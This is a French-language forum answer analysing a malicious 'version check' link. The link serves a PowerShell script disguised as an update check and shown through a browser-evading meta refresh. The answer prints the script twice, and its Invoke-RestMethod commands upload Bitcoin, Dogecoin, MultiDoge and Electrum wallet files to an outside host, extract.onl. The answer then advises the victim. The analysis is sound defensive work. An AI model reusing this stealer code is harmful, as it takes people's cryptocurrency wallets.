AVERTISSEMENT : N'EXÉCUTEZ AUCUN DES CODES CONTENUS DANS CETTE RÉPONSE. IL EST MALVEILLANT ET N'A ÉTÉ INCLUS QUE DANS UN BUT DÉMONSTRATIF.
powershell.software/versioncheck
est un lien malveillant
La page à laquelle il mène se présente comme suit :
$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum
<head>
<style>
body {
background-color: black;
}
</style>
</head>
<meta http-equiv = "refresh" content = "0; url = notfound" />
Lorsque vous essayez de visiter ce lien dans un navigateur, celui-ci vous redirige rapidement loin de cette page, vers une autre page prétendant (pauvrement) que le site n'existe pas :
<meta http-equiv = "refresh" content = "0; url = notfound" />
Cependant, lorsqu'il est exécuté dans la commande complète que vous avez fournie, il reconnaît les lignes suivantes comme des commandes PowerShell :
$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum
C'est un voleur de portefeuille de crypto-monnaies primitif. Chaque ligne commençant par Invoke-RestMethod
tente d'envoyer des données à partir d'autres portefeuilles de crypto-monnaies possibles (si vous en avez installé sur votre ordinateur) vers une page du point d'accès. http://extract.onl
.
Si vous avez des portefeuilles de crypto-monnaies sur l'ordinateur, ils sont maintenant probablement compromis. Transférez tout ce qui s'y trouve vers un autre portefeuille SÉCURISÉ.
Résumer vos préoccupations :
J'ai le sentiment qu'ils n'ont téléchargé que certains fichiers de mon système.
Mais j'ai peur qu'il y ait une porte dérobée sur mon système. Je peux vivre avec le téléchargement, mais pas avec une porte dérobée.
Oui, si ces fichiers sur votre ordinateur existaient, ils ont été téléchargés. C'est tout ce que ce script semble faire cependant, il n'y a donc pas de porte dérobée persistante sur votre système.
Edit 25/10/2021 :
Depuis l'écriture de cette réponse, l'accès au code malveillant à powershell.software/versioncheck
est maintenant empêché (et produit maintenant une erreur 403), mais pourrait revenir à tout moment. Il s'agit toujours d'un risque.
Edit 24/01/2022 :
Le propriétaire de powershell.software/versioncheck
a remis le code malveillant en ligne. C'est toujours un risque.